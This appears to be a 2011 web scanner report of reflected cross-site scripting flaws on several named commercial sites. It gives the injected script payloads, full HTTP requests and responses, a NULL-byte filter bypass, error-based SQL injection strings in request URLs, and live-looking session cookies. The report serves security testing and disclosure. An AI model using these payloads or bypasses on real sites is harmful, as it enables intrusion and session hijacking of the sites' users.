Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload 66835--><script>alert(1)</script>be9690c84fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 36360--><script>alert(1)</script>6c3f9b7fbac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload 938be--><script>alert(1)</script>8fe3bc39588 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E request parameter is copied into an HTML comment. The payload 22046--><script>alert(1)</script>0a045e66a8a was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E22046--><script>alert(1)</script>0a045e66a8a HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:16:24 GMT Server: Apache ETag: "AAAAS7ub5Kb" Last-Modified: Fri, 25 Mar 2011 19:13:32 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38022
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the itemID request parameter is copied into an HTML comment. The payload 60a71--><script>alert(1)</script>23be3cee852 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d1060a71--><script>alert(1)</script>23be3cee852&path=1%2C2%2C195%2C241 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:26:03 GMT Server: Apache ETag: "AAAAS7ucEGn" Last-Modified: Fri, 25 Mar 2011 19:14:17 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38646
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="ve ...[SNIP]...
JVM: tta06 Request: GET https://www.territoryahead.com/errorhandler.jsp?ruleID=8&itemID=1&itemType=ErrorPage&path=1%2C2%2C195%2C241&itemType=ErrorPage&itemID=1&itemType=CATEGORY&itemID=-1+OR+17-7%3d1060a71--><script>alert(1)</script>23be3cee852&path=1%2C2%2C195%2C241 Session ID: auMBUcQMcNOb (from cookie)
5.120. https://www.territoryahead.com/jump.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.territoryahead.com
Path:
/jump.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload de539--><script>alert(1)</script>eea1fdeeba0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E&de539--><script>alert(1)</script>eea1fdeeba0=1 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:17:55 GMT Server: Apache ETag: "AAAAS7ucPZy" Last-Modified: Fri, 25 Mar 2011 19:15:03 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38669
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the path request parameter is copied into an HTML comment. The payload 39c78--><script>alert(1)</script>ebbf84990a5 was submitted in the path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C24139c78--><script>alert(1)</script>ebbf84990a5 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931
The value of the langid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb17"><script>alert(1)</script>fb63dd7b86f was submitted in the langid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contactus/contact-us.asp?langid=en3bb17"><script>alert(1)</script>fb63dd7b86f&src=hbc HTTP/1.1 Host: www2.hbc.com Connection: keep-alive Referer: http://www2.hbc.com/en/index.shtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10820 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDSQXCCBAB=JCAOOEFBMFHPBEJFEIFCGJCJ; secure; path=/ X-Powered-By: ASP.NET Date: Wed, 30 Mar 2011 13:51:17 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e04df<script>alert(1)</script>f493791083e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725 Referer: http://www.google.com/search?hl=en&q=e04df<script>alert(1)</script>f493791083e
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Thu, 31 Mar 2011 00:53:52 GMT Expires: Thu, 31 Mar 2011 00:53:52 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDACSCDSTQ=MIGLCKNBKFIFPCAGJMEPDNMN; path=/ X-Powered-By: ASP.NET Content-Length: 969 Connection: keep-alive
<br>Error Description:No value given for one or more required parameters.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeA ...[SNIP]... @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '497205542', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.google.com/search?hl=en&q=e04df<script>alert(1)</script>f493791083e', @browserName = 'Default', @browserVersion = '0.0', @domain = 'www.google.com', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6. ...[SNIP]...
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 874e8<script>alert(1)</script>5752105b959 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16874e8<script>alert(1)</script>5752105b959 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Thu, 31 Mar 2011 00:53:41 GMT Expires: Thu, 31 Mar 2011 00:53:41 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDQSAACDBD=IKLLEPEBBEOKMFMAJDBGEMOO; path=/ X-Powered-By: ASP.NET Content-Length: 779 Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, ...[SNIP]... @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16874e8<script>alert(1)</script>5752105b959', @segment = 'undefined'<br> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda83"-alert(1)-"46677506f9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/404.jsp HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=eda83"-alert(1)-"46677506f9c User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 25 Mar 2011 19:42:16 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20807
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=eda83"-alert(1)-"46677506f9c"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ca6b"-alert(1)-"9110dd52ec7 was submitted in the Referer HTTP header. This input was echoed as 8ca6b"-alert(1)-"9110dd52ec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1 Host: www.supermedia.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trafficSource=default; CstrStatus=RVU; mbox=session#1301080493266-271579#1301082422|check#true#1301080622; undefined_s=First%20Visit Referer: http://www.google.com/search?hl=en&q=%008ca6b"-alert(1)-"9110dd52ec7
Response
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 25 Mar 2011 19:41:55 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 22982
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=%008ca6b"-alert(1)-"9110dd52ec7"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="No such flow definition with id '(select 1 and row ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac3d5"-alert(1)-"2bfe3cee0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1 Host: www.supermedia.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trafficSource=default; CstrStatus=RVU Referer: http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a
Response
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 25 Mar 2011 19:15:20 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 21861
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Badly formatted flow execution key ''||(utl_inaddr ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d6bc"-alert(1)-"f4dec4eed60 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Referer: 5d6bc"-alert(1)-"f4dec4eed60 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083848|check#true#1301082048; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 25 Mar 2011 19:47:40 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 24596
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="5d6bc"-alert(1)-"f4dec4eed60"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload d915e--><script>alert(1)</script>15454db3650 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount Referer: http://www.google.com/search?hl=en&q=d915e--><script>alert(1)</script>15454db3650
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:34:53 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36933
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the User-Agent HTTP header is copied into an HTML comment. The payload b001b--><script>alert(1)</script>8cb69a80b72 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16b001b--><script>alert(1)</script>8cb69a80b72 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:26:02 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36882
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="ve ...[SNIP]... ers: Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16b001b--><script>alert(1)</script>8cb69a80b72 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: IS ...[SNIP]...
